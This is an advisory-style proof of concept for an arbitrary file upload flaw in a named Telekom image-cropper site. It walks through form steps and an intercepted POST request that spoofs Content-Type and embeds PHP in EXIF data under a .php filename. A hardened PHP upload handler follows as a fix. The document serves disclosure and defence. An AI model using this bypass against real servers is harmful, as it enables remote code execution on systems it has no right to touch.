Proof of Concept (PoC):
=======================
The arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For a security demonstration, or to reproduce the web vulnerability, follow the information and steps below.

a) The attacker visits the main page http://profilbildtool.telekom.de/imagecropper.php?lang=en to create an image using the system.

b) In the "Choose network" section, Twitter can be chosen as the network.

c) In "Type of activity":
   1) The "Official use" radio button should be selected.
   2) Choose "Lead accounts" from the dropdown menu.
   3) The country chosen should be "Austria AT".
   4) In "Select Logo", "T-Systems" should be used.

d) Types of background:
   1) Choose "Picture" as the background.
   2) Browse and choose a specially crafted php or exe file. For example, we will use test.php.
   3) Press upload.

At this point we intercept the request and change "Content-Type: text/php" to "Content-Type: image/jpeg". This bypasses the type check on the server side. The other constraint is the size of the file. We can work around this by generating a specially crafted php file where the php code is placed in the EXIF section of the file; because the file keeps its .php extension, it will still be executed as php. Our request will be similar to this:
POST /scripts/php/process.php HTTP/1.1
Host: profilbildtool.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://profilbildtool.telekom.de/uplFrame.php
Cookie: PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=rd10o00000000000000000000ffffac1c0a2fo8080
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------662283032583176423330776453
Content-Length: 10355

-----------------------------662283032583176423330776453
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
-----------------------------662283032583176423330776453
Content-Disposition: form-data; name="upImg"; filename="test.php"
Content-Type: image/jpeg

[The file content]

The file content should also begin with the header of an image in order to bypass the type check. The response to this request will be similar to:

HTTP/1.1 200 OK
Date: Mon, 30 Dec 2013 05:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 65
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

The extension of the stored file is taken from the filename in our request. This gives us the ability to upload any file type we want.
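As an added example that is not part of the advisory or the vendor's code, the handler below shows how an upload endpoint of this kind avoids the three weaknesses the PoC relies on: it ignores the client-supplied Content-Type and filename, sniffs the real type from the bytes, re-encodes the image (which discards EXIF and other metadata), and stores it under a server-chosen name and extension. The field name upImg comes from the request above; UPLOAD_DIR and MAX_BYTES are assumptions.

```php
<?php
// Added example (not the vendor's process.php): hardened image upload handler.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads'; // assumed; must not be a PHP-executable path
const MAX_BYTES  = 2 * 1024 * 1024;      // assumed size limit

function save_uploaded_image(array $file, string $uploadDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // The request's Content-Type and filename are attacker-controlled, so neither
    // is consulted. The real type is sniffed from the file's bytes instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type');
    }
    // Decode and re-encode with GD. Only pixel data survives, so EXIF or other
    // metadata segments carrying script code are not written to disk.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Server-chosen random name; the extension follows the sniffed type, never
    // the uploaded filename (the flaw exploited above).
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok = ($mime === 'image/png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}

if (isset($_FILES['upImg'])) {
    try {
        echo save_uploaded_image($_FILES['upImg'], UPLOAD_DIR);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

The upload directory should additionally be served with script execution disabled (or kept outside the web root), so that even a bypass of the checks above does not yield code execution.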